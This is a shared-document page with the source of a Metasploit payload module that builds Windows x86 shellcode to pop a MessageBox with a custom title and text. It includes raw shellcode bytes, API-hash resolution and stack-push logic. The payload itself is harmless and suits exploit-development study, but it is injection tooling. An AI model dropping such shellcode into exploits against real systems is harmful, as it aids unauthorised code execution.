Shellcode Win32 MessageBox Metasploit module

Document Sample
Shellcode Win32 MessageBox Metasploit module Powered By Docstoc
					                                    Shellcode Win32 MessageBox Metasploit module                     Page 1/4
   1   ##
   2   # $Id: messagebox.rb 4 2010−02−26 00:28:00:00Z corelanc0d3r & rick2600 $
   3   ##
   4   #
   5   # Installation instructions :
   6   # Drop file in framework3/modules/payloads/singles/windows folder
   7   #
   8   # Usage :   ./msfpayload windows/messagebox TITLE="Corelan" TEXT="Greetz to corelanc0d3r" P
   9   #
  10
  11   require ’msf/core’
  12   module Metasploit3
  13
  14   include Msf::Payload::Windows
  15   include Msf::Payload::Single
  16
  17     def initialize(info = {})
  18         super(update_info(info,
  19          ’Name’                => ’Windows Messagebox with custom title and text’,
  20          ’Version’          => ’$Revision: 4 $’,
  21          ’Description’    => ’Spawns MessageBox with a customizable title & text’,
  22          ’Author’            => [ ’corelanc0d3r − peter.ve[at]corelan.be’,
  23                                          ’rick2600 − ricks2600[at]gmail.com’ ],
  24          ’License’          => BSD_LICENSE,
  25          ’Platform’         => ’win’,
  26          ’Arch’               => ARCH_X86,
  27          ’Privileged’     => false,
  28          ’Payload’           =>
  29                     {
  30                     ’Offsets’ => { },
  31                     ’Payload’ =>      "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31"+
  32                                         "\xd2\xb2\x7a\x31\xc9\x64\x8b\x71"+
  33                                         "\x30\x8b\x76\x0c\x8b\x76\x1c\x8b"+
  34                                         "\x46\x08\x8b\x7e\x20\x8b\x36\x38"+
  35                                         "\x4f\x18\x75\xf3\x59\x01\xd1\xff"+
  36                                         "\xe1\x60\x8b\x6c\x24\x24\x8b\x45"+
  37                                         "\x3c\x8b\x54\x05\x78\x01\xea\x8b"+
  38                                         "\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"+
  39                                         "\x37\x49\x8b\x34\x8b\x01\xee\x31"+
  40                                         "\xff\x31\xc0\xfc\xac\x84\xc0\x74"+
  41                                         "\x0a\xc1\xcf\x0d\x01\xc7\xe9\xf1"+
  42                                         "\xff\xff\xff\x3b\x7c\x24\x28\x75"+
  43                                         "\xde\x8b\x5a\x24\x01\xeb\x66\x8b"+
  44                                         "\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b"+
  45                                         "\x04\x8b\x01\xe8\x89\x44\x24\x1c"+
  46                                         "\x61\xc3\xb2\x08\x29\xd4\x89\xe5"+
  47                                         "\x89\xc2\x68\x8e\x4e\x0e\xec\x52"+
  48                                         "\xe8\x9c\xff\xff\xff\x89\x45\x04"+
  49                                         "\xbb"
  50                                 }
  51                                 ))
  52

corelanc0d3r                                                                                         03/24/2010
                                  Shellcode Win32 MessageBox Metasploit module                Page 2/4
  53                    # EXITFUNC : Only support Process and Thread :/
  54                    deregister_options(’EXITFUNC’)
  55
  56                    # Register MessageBox options
  57                    register_options(
  58                           [
  59                             OptString.new(’EXITFUNC’, [ false,
  60                  "Only Process (default) or Thread are supported","process"]),
  61                            OptString.new(’TITLE’, [ true,
  62                                                 "Messagebox Title (max 255 chars)" ]),
  63                            OptString.new(’TEXT’, [ true,
  64                                                 "Messagebox Text" ])
  65                            ], self.class)
  66            end
  67
  68      #
  69      # Constructs the payload
  70      #
  71     def generate
  72
  73       strExitFunc = datastore[’EXITFUNC’] || "process"
  74       strExitFuncHash = "\x7e\xd8\xe2\x73" #ExitProcess()
  75
  76       strTitle = datastore[’TITLE’]
  77        if (strTitle)
  78
  79           #ExitFunc
  80           if (strExitFunc) then
  81             strExitFunc=strExitFunc.downcase
  82             if strExitFunc == "thread" then
  83               strExitFuncHash="\xEF\xCE\xE0\x60"           #ExitThread()
  84             end
  85           end
  86
  87           #================Process Title==================================
  88           strTitle=strTitle+"X"
  89           iTitle=strTitle.length
  90           if (iTitle < 256)
  91             iNrLines=iTitle/4
  92             iCheckChars = iNrLines * 4
  93             strSpaces=""
  94             iSniperTitle=iTitle−1
  95             if iCheckChars != iTitle then
  96               iTargetChars=(iNrLines+1)*4
  97               while iTitle < iTargetChars
  98                 strSpaces+=" "         #add space
  99                 iTitle+=1
  100              end
  101            end
  102            strTitle=strTitle+strSpaces    #title is now 4 byte aligned
  103                                           #and string ends with X
  104                                           #at index iSniperTitle
corelanc0d3r                                                                                  03/24/2010
                              Shellcode Win32 MessageBox Metasploit module     Page 3/4
  105
  106           #push Title to stack
  107           #start at back of string
  108           strPushTitle=""
  109           strLine=""
  110           icnt=strTitle.length−1
  111           icharcnt=0
  112           while icnt >= 0
  113             thisChar=strTitle[icnt,1]
  114             strLine=thisChar+strLine
  115             if icharcnt < 3
  116               icharcnt+=1
  117             else
  118               strPushTitle=strPushTitle+"h"+strLine    #h = \68 = push
  119               strLine=""
  120               icharcnt=0
  121             end
  122             icnt=icnt−1
  123           end
  124
  125           #generate opcode to write null byte
  126           strWriteTitleNull="\x31\xDB\x88\x5C\x24"
  127           strWriteTitleNull += iSniperTitle.chr + "\x89\xe3"
  128
  129
  130           #================Process Text===============================
  131           #cut text into 4 byte push instructions
  132           strText = datastore[’TEXT’]
  133           strText=strText+"X"
  134           iText=strText.length
  135           iNrLines=iText/4
  136           iCheckChars = iNrLines * 4
  137           strSpaces=""
  138           iSniperText=iText−1
  139           if iCheckChars != iText then
  140             iTargetChars=(iNrLines+1)*4
  141             while iText < iTargetChars
  142                 strSpaces+=" "         #add space
  143                 iText+=1
  144             end
  145           end
  146           strText=strText+strSpaces   #text is now 4 byte aligned
  147                                       #and string ends with X
  148                                       #at index iSniperTitle
  149
  150          #push Text to stack
  151          #start at back of string
  152          strPushText=""
  153          strLine=""
  154          icnt=strText.length−1
  155          icharcnt=0
  156          while icnt >= 0
corelanc0d3r                                                                   03/24/2010
                                   Shellcode Win32 MessageBox Metasploit module         Page 4/4
  157              thisChar=strText[icnt,1]
  158              strLine=thisChar+strLine
  159              if icharcnt < 3
  160                  icharcnt+=1
  161              else
  162                  strPushText=strPushText+"h"+strLine            #h = \68 = push
  163                  strLine=""
  164                  icharcnt=0
  165              end
  166              icnt=icnt−1
  167            end
  168
  169            #generate opcode to write null byte
  170            strWriteTextNull="\x31\xc9\x88\x4C\x24"
  171            strWriteTextNull += iSniperText.chr + "\x89\xe1"
  172
  173
  174            #build payload
  175            payload_data = module_info[’Payload’][’Payload’]
  176            payload_data += strExitFuncHash
  177            payload_data += "\x87\x1c\x24"
  178            payload_data += "\x52\xe8\x8b\xff\xff\xff\x89\x45"
  179            payload_data += "\x08\x68\x6c\x6c\x20\xff\x68\x33"
  180            payload_data += "\x32\x2e\x64\x68\x75\x73\x65\x72"
  181            payload_data += "\x88\x5c\x24\x0a\x89\xe6\x56\xff"
  182            payload_data += "\x55\x04\x89\xc2\x50\xbb\xa8\xa2"
  183            payload_data += "\x4d\xbc\x87\x1c\x24\x52\xe8\x5e"
  184            payload_data += "\xff\xff\xff"
  185            payload_data += strPushTitle + strWriteTitleNull
  186            payload_data += strPushText + strWriteTextNull
  187            payload_data += "\x31\xd2\x52"
  188            payload_data += "\x53\x51\x52\xff\xd0\x31\xc0\x50"
  189            payload_data += "\xff\x55\x08"
  190
  191
  192            return payload_data
  193          else
  194             raise ArgumentError, "Title should be 255 characters or less"
  195          end
  196        end
  197      end
  198   end




corelanc0d3r                                                                            03/24/2010

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:60
posted:5/24/2010
language:English
pages:4